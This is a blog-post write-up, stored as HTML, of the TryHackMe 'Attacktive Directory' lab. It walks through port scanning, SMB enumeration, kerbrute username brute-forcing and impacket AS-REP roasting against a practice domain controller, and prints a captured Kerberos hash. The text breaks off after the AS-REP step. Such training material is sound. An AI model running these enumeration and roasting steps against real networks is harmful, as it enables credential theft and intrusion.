<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" >
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="Attacktive Directory" />
<meta name="author" content="Anas" />
<meta property="og:locale" content="en" />
<meta name="description" content="99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?" />
<meta property="og:description" content="99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?" />
<link rel="canonical" href="https://github.com/NullBrunk/posts/thm-attacktivedirectory/" />
<meta property="og:url" content="https://github.com/NullBrunk/posts/thm-attacktivedirectory/" />
<meta property="og:site_name" content="NullBrunk" />
<meta property="og:image" content="https://github.com/NullBrunk/assets/img/writeups/thm/attacktivedirectory/attacktive_main.png" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-12-29T16:00:00+00:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="https://github.com/NullBrunk/assets/img/writeups/thm/attacktivedirectory/attacktive_main.png" />
<meta property="twitter:title" content="Attacktive Directory" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Anas","url":"https://github.com/NullBrunk/"},"dateModified":"2024-12-29T16:00:00+00:00","datePublished":"2024-12-29T16:00:00+00:00","description":"99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?","headline":"Attacktive Directory","image":"https://github.com/NullBrunk/assets/img/writeups/thm/attacktivedirectory/attacktive_main.png","mainEntityOfPage":{"@type":"WebPage","@id":"https://github.com/NullBrunk/posts/thm-attacktivedirectory/"},"url":"https://github.com/NullBrunk/posts/thm-attacktivedirectory/"}</script>
<!-- End Jekyll SEO tag -->


  <title>Attacktive Directory | NullBrunk
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="NullBrunk">
<meta name="application-name" content="NullBrunk">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>



<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/favicons/logo.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">NullBrunk</a>
    <p class="site-subtitle fst-italic mb-0">Web pentester, CTF player.</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
          
          <li class="nav-item">
            <a href="/ctfs/" class="nav-link">
              <i class="fa-fw fas fa-flag"></i>
              

              <span>CTFS</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/tools/" class="nav-link">
              <i class="fa-fw fas fas fa-code"></i>
              

              <span>TOOLS</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/tags/" class="nav-link">
              <i class="fa-fw fas fa-tags"></i>
              

              <span>TAGS</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/resume/" class="nav-link">
              <i class="fa-fw fas fa-file"></i>
              

              <span>RESUME</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/about/" class="nav-link">
              <i class="fa-fw fas fa-info-circle"></i>
              

              <span>ABOUT</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
        
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap justify-content-center align-items-center w-100">
    <a href="https://ctftime.org/user/157452" aria-label="github" target="_blank" rel="noopener noreferrer">
      <i class="fa-regular fa-font-awesome"></i>
    </a>


    
      

      
        <a
          href="https://www.root-me.org/NullBrunk?q=%2FNullbrunk"
          aria-label="root-me"
          

          

          

          
        >
          <i class="fas fa-skull"></i>
        </a>
      
    
      

      
        <a
          href="https://github.com/nullbrunk"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    
      

      
        <a
          href="https://www.linkedin.com/in/anas-idiri-b05733229"
          aria-label="linkedin"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-linkedin"></i>
        </a>
      
    

    <a href="mailto:anas.idiri.pro@gmail.com" aria-label="github" target="_blank" rel="noopener noreferrer">
      <i class="fa-solid fa-envelope"></i>
    </a>
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!--  include topbar.html lang=lang -->

        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11   col-xl-9  px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  




<!-- return -->










<header id="topbar-wrapper" aria-label="Top Bar">
    <div id="topbar" class="d-flex align-items-center justify-content-between h-100" >
        <nav id="breadcrumb" aria-label="Breadcrumb">
            <span><a href="/">Home</a></span>
             

            
                <span>
                 <a href="/categories/writeups/">Writeups</a>
                </span>
            
                <span>
                 <a href="/categories/tryhackme/">TryHackMe</a>
                </span>
            

             
             
            

            
             
            
            <span>Attacktive Directory</span>
        </nav>
    </div>
</header>

<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>Attacktive Directory</h1>
    
      <p class="post-desc fw-light mb-4">99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?</p>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1735488000"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Dec 29, 2024
</time>

      </span>

      <!-- lastmod date -->
      

      
        
        
        

        

        <div class="mt-3 mb-3">
          <a href="/assets/img/writeups/thm/attacktivedirectory/attacktive_main.png" class="popup img-link preview-img shimmer"><img src="/assets/img/writeups/thm/attacktivedirectory/attacktive_main.png"  alt="Preview Image" width="1200" height="630"  loading="lazy"></a></div>
      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              
                <a href="https://github.com/NullBrunk/">Anas</a>
                
              
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="1421 words"
>
  <em>7 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">Attacktive Directory</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">Attacktive Directory</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <h1 id="introduction">Introduction</h1>

<p>Hello everyone, today we’ll be taking a look at <a href="https://tryhackme.com/r/room/attacktivedirectory">Attacktive Directory</a>, a <span class="medium">Medium</span> guided room on <a href="https://tryhackme.com/">TryHackMe</a>. We’ll explore the exploitation of a vulnerable Domain Controller via ASRepRoasting with <code class="language-plaintext highlighter-rouge">impacket</code>, and as a bonus we’ll cover the generation of Golden Tickets. Let’s get started.</p>

<ol>
  <li>Enumeration
    <ul>
      <li><a href="#portscan">Portscan</a></li>
      <li><a href="#smb-139-445">SMB (139,445)</a></li>
      <li><a href="#enumerating-users">Enumerating users</a></li>
    </ul>
  </li>
  <li>Exploitation
    <ul>
      <li><a href="#asreproasting">ASRepRoasting</a></li>
      <li><a href="#re-enumerating-smb">Re-Enumerating SMB</a></li>
    </ul>
  </li>
  <li>Privesc
    <ul>
      <li><a href="#secretsdump">Secretsdump</a></li>
      <li><a href="#getting-flags">Getting flags</a></li>
    </ul>
  </li>
  <li>Bonus
    <ul>
      <li><a href="#generating-golden-tickets">Generating Golden Tickets</a></li>
    </ul>
  </li>
</ol>

<hr />

<p><br /></p>

<h1 id="enumeration">Enumeration</h1>

<h2 id="portscan"><span class="me-2">Portscan</span><a href="#portscan" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>It’s not asked but let’s start with a port scan. As always, I use <a href="https://github.com/RustScan/RustScan">rustscan</a> and specify the nmap options with the <code class="language-plaintext highlighter-rouge">-- NMAP_OPTIONS</code> syntax. In this case, we’re scanning for service versions and outputting the result to a file named <code class="language-plaintext highlighter-rouge">all_ports.txt</code>.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>rustscan <span class="nt">-a</span> <span class="nv">$TARGET_IP</span> <span class="nt">--</span> <span class="nt">-sV</span> <span class="nt">-oN</span> all_ports.txt
</pre></td></tr></tbody></table></code></div></div>
<div file="all_ports.txt" class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="all_ports.txt"><i class="far fa-file-code fa-fw"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td><td class="rouge-code"><pre>PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos <span class="o">(</span>server <span class="nb">time</span>: 2024-12-29 12:52:00Z<span class="o">)</span>
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: spookysec.local0., Site: Default-First-Site-Name<span class="o">)</span>
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span>
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
<span class="nt">-------</span> a few MSRPC ports used internally, not relevant 
</pre></td></tr></tbody></table></code></div></div>

<p><strong>What do we learn from this portscan ?</strong></p>
<ul>
  <li>The target is likely a Domain Controller</li>
  <li>The target is part of a domain named <code class="language-plaintext highlighter-rouge">spookysec.local</code></li>
  <li>There are <strong>ton</strong> of services running</li>
</ul>

<h2 id="smb-139-445"><span class="me-2">SMB (139, 445)</span><a href="#smb-139-445" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Since it’s a guided room, we don’t have to explore all the services. Let’s map the domain <code class="language-plaintext highlighter-rouge">spookysec.local</code> to the the DC’s IP:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nb">echo</span> <span class="s2">"</span><span class="nv">$TARGET_IP</span><span class="s2"> spookysec.local"</span> <span class="o">&gt;&gt;</span> /etc/hosts
</pre></td></tr></tbody></table></code></div></div>

<p>Next let’s enumerate smb with the <a href="https://www.kali.org/tools/enum4linux/">enum4linux</a> tool. Here is the output where <strong>I removed the irrelevant parts</strong>:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre></td><td class="rouge-code"><pre>┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-[~/Chall/THM/Attacktivedirectory/Enum]
└─<span class="nv">$ </span>enum4linux <span class="nv">$TARGET_IP</span>

<span class="o">[</span>+] Server 10.10.60.35 allows sessions using username <span class="s1">''</span>, password <span class="s1">''</span>

Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963

	Sharename       Type      Comment
	<span class="nt">---------</span>       <span class="nt">----</span>      <span class="nt">-------</span>
Reconnecting with SMB1 <span class="k">for </span>workgroup listing.
Unable to connect with SMB1 <span class="nt">--</span> no workgroup available

S-1-5-21-3591857110-2884097990-301047963-500 THM-AD<span class="se">\A</span>dministrator <span class="o">(</span>Local User<span class="o">)</span>
S-1-5-21-3591857110-2884097990-301047963-501 THM-AD<span class="se">\G</span>uest <span class="o">(</span>Local User<span class="o">)</span>
S-1-5-21-3591857110-2884097990-301047963-502 THM-AD<span class="se">\k</span>rbtgt <span class="o">(</span>Local User<span class="o">)</span>
</pre></td></tr></tbody></table></code></div></div>

<p>We get the NetBIOS-Domain name and some <code class="language-plaintext highlighter-rouge">users</code> that we could try to Kerberoast / ASRepRoast … More on that later.</p>

<h5 id="answering-questions"><span class="me-2">Answering questions</span><a href="#answering-questions" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>
<blockquote class="prompt-info">
  <p><strong>What tool will allow us to enumerate port 139/445?</strong>
<br /><a href="https://www.kali.org/tools/enum4linux/">enum4linux</a> is a well-known tool that allows you to enumerate information from Windows and Samba systems.</p>
</blockquote>

<blockquote class="prompt-info">
  <p><strong>What is the NetBIOS-Domain Name of the machine?</strong>
<br /><code class="language-plaintext highlighter-rouge">THM-AD</code></p>
</blockquote>

<blockquote class="prompt-info">
  <p><strong>What invalid TLD do people commonly use for their Active Directory Domain?</strong>
<br />Earlier, we saw in the <a href="#welcome-to-attacktive-directory">portscan</a> that the FQDN  was <code class="language-plaintext highlighter-rouge">spookysec.local</code>. The TLD (Top Level Domain) is basically the <em>“extension”</em>, in our case it’s <code class="language-plaintext highlighter-rouge">.local</code>.</p>
</blockquote>

<h2 id="enumerating-users"><span class="me-2">Enumerating users</span><a href="#enumerating-users" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>We are asked to use <a href="https://github.com/ropnop/kerbrute">kerbrute</a> with this <a href="https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt">username wordlist</a> to bruteforce users from the Active Directory by attacking Kerberos, so let’s do that:</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>kerbrute usernum <span class="nt">--dc</span> <span class="s2">"</span><span class="nv">$TARGET_IP</span><span class="s2">"</span> <span class="nt">-d</span> <span class="s2">"</span><span class="nv">$DOMAIN_NAME</span><span class="s2">"</span> <span class="s2">"</span><span class="nv">$WORDLIST</span><span class="s2">"</span>
</pre></td></tr></tbody></table></code></div></div>

<p><a href="/assets/img/writeups/thm/attacktivedirectory/kerbrute.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/attacktivedirectory/kerbrute.png" alt="kerbrute"  loading="lazy"></a>
<em>Kerbrute found a few AD users</em></p>

<p>I will put thoses usernames in a file before continuing:</p>
<div file="real_users.txt" class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="real_users.txt"><i class="far fa-file-code fa-fw"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre>Administrator
Guest
DefaultAccount
WDAGUtilityAccount
james
svc-admin
robin
darkstar
backup
paradox
</pre></td></tr></tbody></table></code></div></div>

<h5 id="answering-questions-1"><span class="me-2">Answering questions</span><a href="#answering-questions-1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>
<blockquote class="prompt-info">
  <p><strong>What command within Kerbrute will allow us to enumerate valid usernames?</strong>
<br />
<code class="language-plaintext highlighter-rouge">userenum</code>.</p>
</blockquote>

<blockquote class="prompt-info">
  <p><strong>What notable account is discovered? (These should jump out at you)</strong>
<br />
<code class="language-plaintext highlighter-rouge">svc-admin</code> (for service admin) seems interesting.</p>
</blockquote>

<blockquote class="prompt-info">
  <p><strong>What is the other notable account is discovered? (These should jump out at you)</strong>
<br />
<code class="language-plaintext highlighter-rouge">backup</code> could also potentially be interesting.</p>
</blockquote>

<h1 id="exploitation">Exploitation</h1>

<h2 id="asreproasting"><span class="me-2">ASRepRoasting</span><a href="#asreproasting" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<blockquote>
  <p>Impacket has a tool called “GetNPUsers.py” that will allow us to query ASReproastable accounts from the Key Distribution Center. The only thing that’s necessary to query accounts is a valid set of usernames which we enumerated previously via Kerbrute.</p>
</blockquote>

<p>You can learn more about ASRepRoasting <a href="https://beta.hackndo.com/kerberos-asrep-roasting/">here</a>. Basically, we query the Key Distribution Center (KDC) for TGTs (Ticket Granting Tickets) as other users. If the user is vulnerable to ASRepRoasting, the KDC will send us a TGT that we’ll attempt to crack to obtain the user’s password</p>

<p>Let’s use the <code class="language-plaintext highlighter-rouge">GetNPUsers</code> script from <a href="https://www.kali.org/tools/impacket/">Impacket</a> to search for ASRepRoastable users and ask the KDC for TGTs as those users. You can learn more about this script <a href="https://tools.thehacker.recipes/impacket/examples/getnpusers.py">here</a>.</p>

<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>impacket-GetNPUsers <span class="nt">-dc-ip</span> <span class="nv">$TARGET_IP</span> <span class="s2">"</span><span class="nv">$DOMAIN_NAME</span><span class="s2">/"</span> <span class="nt">-usersfile</span> <span class="nv">$USERS_FOUND_WITH_KERBRUTE</span>
</pre></td></tr></tbody></table></code></div></div>
<p><a href="/assets/img/writeups/thm/attacktivedirectory/token_as_rep.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/attacktivedirectory/token_as_rep.png" alt="as_rep"  loading="lazy"></a>
<em>svc-admin is ASRepRoastable</em></p>

<p>And use john to crack this kerberos AS-REP:</p>
<div file="to_john" class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="to_john"><i class="far fa-file-code fa-fw"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:542ffcaff5ff973571221ce247639de5$5c015375d1747520c65cfd0e274742646078ed1bbc30bf1e9dd63fa32be9d663e62ec8271864c9ba8fa7a299f3802b2faff8dfd6d1684682eb82d8a22b6da935f890fa490ba3767331584e16c4622407ab473e2c190a22a470e9fed5750a49234d0099b44f9e0f180c96e492d614bc137226a8f872c4c731a6ab03ef88ced8014c32e180d8b7afcd404602d8bad7a6bcda4b97107aef337ab9192ffcc7c23a6f8b6f9101cc006d39c2188c1aa4fc31d87bde8737465ee6d31a13d36538b9381143d295a158a6602792d48fbf4119028f9ca7b233def4de701fa339d8eb332ec9fcb9c4b6662710a72bf35601d0b7d79c7aaa
</pre></td></tr></tbody></table></code></div></div>

<p><a href="/assets/img/writeups/thm/attacktivedirectory/john.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/thm/attacktivedirectory/john.png" alt="as_rep"  loading="lazy"></a>
<em>Bingo !</em></p>

<h5 id="answering-questions-2"><span class="me-2">Answering questions</span><a href="#answering-questions-2" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>
<blockquote class="prompt-info">
